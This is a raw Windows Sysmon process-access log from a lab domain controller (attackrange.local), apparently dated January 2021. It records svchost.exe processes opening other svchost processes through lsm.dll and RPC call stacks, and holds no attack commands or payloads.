13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.857{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.592{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 